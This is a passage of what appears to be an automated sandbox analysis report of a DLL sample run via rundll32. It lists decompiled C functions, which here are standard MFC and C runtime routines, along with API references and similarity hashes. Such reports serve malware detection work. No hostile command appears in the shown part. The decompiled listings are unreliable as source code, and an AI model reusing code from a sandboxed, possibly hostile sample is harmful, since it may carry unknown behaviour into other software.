                                                                        					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
                                                                        				}
                                                                        				_t10 = _t20 + 8; // 0x8
                                                                        				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
                                                                        			}









                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ___addl
                                                                        • String ID:
                                                                        • API String ID: 2260456530-0
                                                                        • Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                        • Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
                                                                        • Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                        • Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v264;
                                                                        				intOrPtr _t10;
                                                                        				int _t20;
                                                                        
                                                                        				_t10 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t10;
                                                                        				_t20 = lstrlenA(_a8);
                                                                        				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
                                                                        					_t13 = SetWindowTextA(_a4, _a8);
                                                                        				}
                                                                        				return E100117AE(_t13, _v8);
                                                                        			}








                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow$lstrcmplstrlen
                                                                        • String ID:
                                                                        • API String ID: 330964273-0
                                                                        • Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                        • Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
                                                                        • Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                        • Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100308EB(void* __ecx, void* __eflags) {
                                                                        				signed int _t8;
                                                                        				int _t9;
                                                                        				void* _t11;
                                                                        				void* _t12;
                                                                        				signed int* _t13;
                                                                        				void* _t14;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				E10030582(__ecx, __eflags, 1);
                                                                        				ReleaseCapture();
                                                                        				_t11 = E100220EE(_t14, GetDesktopWindow());
                                                                        				LockWindowUpdate(0);
                                                                        				_t13 = _t12 + 0x84;
                                                                        				_t8 =  *_t13;
                                                                        				if(_t8 != 0) {
                                                                        					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
                                                                        					 *_t13 =  *_t13 & 0x00000000;
                                                                        					return _t9;
                                                                        				}
                                                                        				return _t8;
                                                                        			}










                                                                        APIs
                                                                          • Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
                                                                          • Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                        • ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
                                                                        • GetDesktopWindow.USER32 ref: 100308FC
                                                                        • LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
                                                                        • ReleaseDC.USER32 ref: 10030924
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                        • String ID:
                                                                        • API String ID: 1260764132-0
                                                                        • Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                        • Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
                                                                        • Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                        • Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E100128A7(void* __ebx, void* __edi, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				char _v21;
                                                                        				signed char _v22;
                                                                        				struct _cpinfo _v28;
                                                                        				char _v284;
                                                                        				char _v540;
                                                                        				char _v796;
                                                                        				char _v1308;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t42;
                                                                        				signed int _t45;
                                                                        				char _t47;
                                                                        				signed char _t48;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				signed int _t65;
                                                                        				signed int _t68;
                                                                        				signed char _t70;
                                                                        				char _t71;
                                                                        				signed int _t73;
                                                                        				signed int _t74;
                                                                        				signed char* _t78;
                                                                        				signed char* _t79;
                                                                        				void* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        
                                                                        				_t80 = __edi;
                                                                        				_t63 = __ebx;
                                                                        				_t42 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t42;
                                                                        				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
                                                                        					_t45 = 0;
                                                                        					__eflags = 0;
                                                                        					do {
                                                                        						__eflags = _t45 - 0x41;
                                                                        						if(_t45 < 0x41) {
                                                                        							L23:
                                                                        							__eflags = _t45 - 0x61;
                                                                        							if(_t45 < 0x61) {
                                                                        								L26:
                                                                        								 *(_t45 + 0x10050ba0) = 0;
                                                                        							} else {
                                                                        								__eflags = _t45 - 0x7a;
                                                                        								if(_t45 > 0x7a) {
                                                                        									goto L26;
                                                                        								} else {
                                                                        									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
                                                                        									_t68 = _t45 - 0x20;
                                                                        									goto L22;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t45 - 0x5a;
                                                                        							if(_t45 > 0x5a) {
                                                                        								goto L23;
                                                                        							} else {
                                                                        								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
                                                                        								_t68 = _t45 + 0x20;
                                                                        								__eflags = _t68;
                                                                        								L22:
                                                                        								 *(_t45 + 0x10050ba0) = _t68;
                                                                        							}
                                                                        						}
                                                                        						_t45 = _t45 + 1;
                                                                        						__eflags = _t45 - 0x100;
                                                                        					} while (_t45 < 0x100);
                                                                        				} else {
                                                                        					_t47 = 0;
                                                                        					do {
                                                                        						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
                                                                        						_t47 = _t47 + 1;
                                                                        					} while (_t47 < 0x100);
                                                                        					_t48 = _v22;
                                                                        					_v284 = 0x20;
                                                                        					if(_t48 != 0) {
                                                                        						_push(__ebx);
                                                                        						_t78 =  &_v21;
                                                                        						_push(__edi);
                                                                        						do {
                                                                        							_t65 =  *_t78 & 0x000000ff;
                                                                        							_t59 = _t48 & 0x000000ff;
                                                                        							if(_t59 <= _t65) {
                                                                        								_t73 = _t65 - _t59 + 1;
                                                                        								_t74 = _t73 >> 2;
                                                                        								_t81 = _t86 + _t59 - 0x118;
                                                                        								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
                                                                        								_t87 = _t87 + 0x18;
                                                                        								_t65 = 0;
                                                                        							}
                                                                        							_t79 =  &(_t78[1]);
                                                                        							_t48 =  *_t79;
                                                                        							_t78 =  &(_t79[1]);
                                                                        							_t96 = _t48;
                                                                        						} while (_t48 != 0);
                                                                        						_pop(_t80);
                                                                        						_pop(_t63);
                                                                        					}
                                                                        					_push(0);
                                                                        					_push( *0x10050a68);
                                                                        					_push( *0x10050b84);
                                                                        					_push( &_v1308);
                                                                        					_push(0x100);
                                                                        					_push( &_v284);
                                                                        					_push(1);
                                                                        					E1001843D(_t63, _t65, _t80, 0x100, _t96);
                                                                        					_push(0);
                                                                        					_push( *0x10050b84);
                                                                        					_push(0x100);
                                                                        					_push( &_v540);
                                                                        					_push(0x100);
                                                                        					_push( &_v284);
                                                                        					_push(0x100);
                                                                        					_push( *0x10050a68);
                                                                        					E10018081(_t63, _t80, 0x100, _t96);
                                                                        					_push(0);
                                                                        					_push( *0x10050b84);
                                                                        					_push(0x100);
                                                                        					_push( &_v796);
                                                                        					_push(0x100);
                                                                        					_push( &_v284);
                                                                        					_push(0x200);
                                                                        					_push( *0x10050a68);
                                                                        					E10018081(_t63, _t80, 0x100, _t96);
                                                                        					_t58 = 0;
                                                                        					do {
                                                                        						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
                                                                        						if((_t70 & 0x00000001) == 0) {
                                                                        							__eflags = _t70 & 0x00000002;
                                                                        							if((_t70 & 0x00000002) == 0) {
                                                                        								 *((char*)(_t58 + 0x10050ba0)) = 0;
                                                                        							} else {
                                                                        								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
                                                                        								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
                                                                        								goto L12;
                                                                        							}
                                                                        						} else {
                                                                        							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
                                                                        							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
                                                                        							L12:
                                                                        							 *((char*)(_t58 + 0x10050ba0)) = _t71;
                                                                        						}
                                                                        						_t58 = _t58 + 1;
                                                                        					} while (_t58 < 0x100);
                                                                        				}
                                                                        				return E100117AE(_t45, _v8);
                                                                        			}






























                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID: $
                                                                        • API String ID: 1807457897-3032137957
                                                                        • Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                        • Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
                                                                        • Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                        • Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E10018871(intOrPtr* __eax, char* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                        				signed int _t33;
                                                                        				char* _t40;
                                                                        				char* _t47;
                                                                        				char* _t48;
                                                                        				intOrPtr* _t49;
                                                                        				intOrPtr* _t50;
                                                                        				char* _t51;
                                                                        				char _t52;
                                                                        				intOrPtr* _t62;
                                                                        				signed int _t63;
                                                                        				signed int _t64;
                                                                        
                                                                        				_t40 = __ebx;
                                                                        				_t62 = __eax;
                                                                        				if(_a12 != 0) {
                                                                        					E10018854((0 |  *__eax == 0x0000002d) + __ebx, 0 | _a4 > 0x00000000);
                                                                        				}
                                                                        				_t28 = _t40;
                                                                        				if( *_t62 == 0x2d) {
                                                                        					 *_t40 = 0x2d;
                                                                        					_t28 = _t40 + 1;
                                                                        				}
                                                                        				if(_a4 > 0) {
                                                                        					_t51 = _t28 + 1;
                                                                        					 *_t28 =  *_t51;
                                                                        					_t28 = _t51;
                                                                        					_t52 =  *0x1004cf04; // 0x2e
                                                                        					 *_t51 = _t52;
                                                                        				}
                                                                        				_t47 = E10017B90((0 | _a12 == 0x00000000) + _t28 + _a4, "e+000");
                                                                        				if(_a8 != 0) {
                                                                        					 *_t47 = 0x45;
                                                                        				}
                                                                        				_t48 = _t47 + 1;
                                                                        				if( *((char*)( *((intOrPtr*)(_t62 + 0xc)))) != 0x30) {
                                                                        					_t33 =  *((intOrPtr*)(_t62 + 4)) - 1;
                                                                        					if(_t33 < 0) {
                                                                        						_t33 =  ~_t33;
                                                                        						 *_t48 = 0x2d;
                                                                        					}
                                                                        					_t49 = _t48 + 1;
                                                                        					if(_t33 >= 0x64) {
                                                                        						asm("cdq");
                                                                        						_t64 = 0x64;
                                                                        						 *_t49 =  *_t49 + _t33 / _t64;
                                                                        						_t33 = _t33 % _t64;
                                                                        					}
                                                                        					_t50 = _t49 + 1;
                                                                        					if(_t33 >= 0xa) {
                                                                        						asm("cdq");
                                                                        						_t63 = 0xa;
                                                                        						 *_t50 =  *_t50 + _t33 / _t63;
                                                                        						_t33 = _t33 % _t63;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t50 + 1)) =  *((intOrPtr*)(_t50 + 1)) + _t33;
                                                                        				}
                                                                        				return _t40;
                                                                        			}


                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: __shift_strcat_strlen
                                                                        • String ID: e+000
                                                                        • API String ID: 208078240-1027065040
                                                                        • Opcode ID: 1a341bb0d3ad14af8978000b563bb186d51df1d89655497ce7b3696246054d84
                                                                        • Instruction ID: 91aa6cf5b5fdaf298b495f8a89a630845dc3f9b5d40380b01f6205b1ce8f2fe9
                                                                        • Opcode Fuzzy Hash: 1a341bb0d3ad14af8978000b563bb186d51df1d89655497ce7b3696246054d84
                                                                        • Instruction Fuzzy Hash: 1321D2722093D59FD70A9E388C907A53BD19B03258F1C44BEE189CF292DA7ADBC5C352
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				struct _WNDCLASSA _v44;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				void* _t25;
                                                                        				intOrPtr _t37;
                                                                        				void* _t38;
                                                                        				struct HINSTANCE__* _t41;
                                                                        				CHAR* _t43;
                                                                        
                                                                        				_t38 = __ecx;
                                                                        				_t43 = E100373A5() + 0x7c;
                                                                        				_t25 = E100373B5();
                                                                        				_t37 = _a8;
                                                                        				_t41 =  *(_t25 + 8);
                                                                        				if(_t37 != 0 || _a12 != _t37) {
                                                                        					L4:
                                                                        					_push(_a16);
                                                                        					_push(_a12);
                                                                        					_push(_t37);
                                                                        					_push(_a4);
                                                                        					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
                                                                        					goto L5;
                                                                        				} else {
                                                                        					_t49 = _a16 - _t37;
                                                                        					if(_a16 != _t37) {
                                                                        						goto L4;
                                                                        					}
                                                                        					_push(_a4);
                                                                        					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
                                                                        					L5:
                                                                        					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
                                                                        						_v44.style = _a4;
                                                                        						_v44.lpfnWndProc = DefWindowProcA;
                                                                        						_v44.cbWndExtra = 0;
                                                                        						_v44.cbClsExtra = 0;
                                                                        						_v44.lpszMenuName = 0;
                                                                        						_v44.hIcon = _a16;
                                                                        						_t40 = _a12;
                                                                        						_push( &_v44);
                                                                        						_v44.hInstance = _t41;
                                                                        						_v44.hCursor = _t37;
                                                                        						_v44.hbrBackground = _a12;
                                                                        						_v44.lpszClassName = _t43;
                                                                        						if(E10020B9B() == 0) {
                                                                        							E10028C0C(_t40);
                                                                        						}
                                                                        					}
                                                                        					return _t43;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClassInfo
                                                                        • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                        • API String ID: 3534257612-2801496823
                                                                        • Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                        • Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
                                                                        • Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                        • Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E100165C9() {
                                                                        				signed int _v8;
                                                                        				char _v12;
                                                                        				void* __ecx;
                                                                        				void* __esi;
                                                                        				CHAR* _t10;
                                                                        				signed int _t16;
                                                                        				signed int _t22;
                                                                        				CHAR* _t25;
                                                                        				signed int _t34;
                                                                        				intOrPtr _t45;
                                                                        
                                                                        				_push(_t27);
                                                                        				_t45 =  *0x10050cac; // 0x1
                                                                        				if(_t45 == 0) {
                                                                        					E10012D82();
                                                                        				}
                                                                        				 *0x1004f6fc = 0;
                                                                        				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
                                                                        				_t10 =  *0x10050cb0; // 0x31534e0
                                                                        				 *0x1004f410 = 0x1004f5f8;
                                                                        				if(_t10 == 0) {
                                                                        					L4:
                                                                        					_t25 = 0x1004f5f8;
                                                                        				} else {
                                                                        					_t25 = _t10;
                                                                        					if( *_t10 == 0) {
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
                                                                        				_t40 = _v8 << 2;
                                                                        				_t16 = E100107B6(_v12 + (_v8 << 2));
                                                                        				_t34 = _t16;
                                                                        				if(_t34 != 0) {
                                                                        					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
                                                                        					 *0x1004f3f4 = _v8 - 1;
                                                                        					 *0x1004f3f8 = _t34;
                                                                        					_t22 = 0;
                                                                        				} else {
                                                                        					_t22 = _t16 | 0xffffffff;
                                                                        				}
                                                                        				return _t22;
                                                                        			}


                                                                        APIs
                                                                        • ___initmbctable.LIBCMT ref: 100165DB
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName___initmbctable
                                                                        • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                        • API String ID: 767393020-2837366778
                                                                        • Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                        • Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
                                                                        • Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                        • Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
                                                                        				intOrPtr _v8;
                                                                        				char _v268;
                                                                        				intOrPtr _v272;
                                                                        				intOrPtr _v276;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t39;
                                                                        				int _t40;
                                                                        				void* _t50;
                                                                        				char* _t51;
                                                                        				intOrPtr _t52;
                                                                        				char* _t61;
                                                                        				signed int _t62;
                                                                        				CHAR* _t64;
                                                                        				signed int _t73;
                                                                        				void* _t74;
                                                                        				CHAR* _t82;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t87;
                                                                        
                                                                        				_t39 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t39;
                                                                        				_v272 = __ecx;
                                                                        				if(_a12 == 0) {
                                                                        					L10:
                                                                        					_t40 = 0;
                                                                        					__eflags = 0;
                                                                        					L11:
                                                                        					return E100117AE(_t40, _v8);
                                                                        				}
                                                                        				_t73 = _a8 << 2;
                                                                        				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
                                                                        				if(_t85 == 0) {
                                                                        					goto L10;
                                                                        				}
                                                                        				_t77 = _a4;
                                                                        				_t82 = E100017D0(_a4, _t85 + 1);
                                                                        				if(_t82 == 0) {
                                                                        					E1001CE3B(_t77);
                                                                        				}
                                                                        				_t74 = lstrcpynA;
                                                                        				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
                                                                        				_t50 = E10038481(_t82, 0, 0);
                                                                        				_t51 = _a16;
                                                                        				_t87 = _t85 - _t50 + 1;
                                                                        				_v276 = _t87;
                                                                        				if(_t87 != _t51) {
                                                                        					L7:
                                                                        					_t52 = _v272;
                                                                        					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
                                                                        					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
                                                                        						_a12 = _t87 + _t82;
                                                                        						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
                                                                        						__eflags = 0x104;
                                                                        						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
                                                                        						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
                                                                        					}
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t61 = _t51 + _t82;
                                                                        					_a11 =  *((intOrPtr*)(_t87 + _t82));
                                                                        					_a16 = _t61;
                                                                        					 *_t61 = 0;
                                                                        					_t62 = lstrcmpiA(_a12, _t82);
                                                                        					asm("sbb eax, eax");
                                                                        					_t64 =  ~_t62 + 1;
                                                                        					_a12 = _t64;
                                                                        					 *((char*)(_t87 + _t82)) = _a11;
                                                                        					if(_t64 == 0) {
                                                                        						goto L7;
                                                                        					}
                                                                        					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
                                                                        					lstrcpynA(_t82,  &_v268, 0x104);
                                                                        					L9:
                                                                        					E10006CE2(_t74, _a4, _t82, 0xffffffff);
                                                                        					_t40 = 1;
                                                                        					goto L11;
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
                                                                        • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59
                                                                          • Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C
                                                                        • lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93
                                                                          • Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                          • Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
                                                                        • String ID:
                                                                        • API String ID: 1551867014-0
                                                                        • Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                        • Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
                                                                        • Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                        • Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10013EDE() {
                                                                        				signed int _t15;
                                                                        				void* _t17;
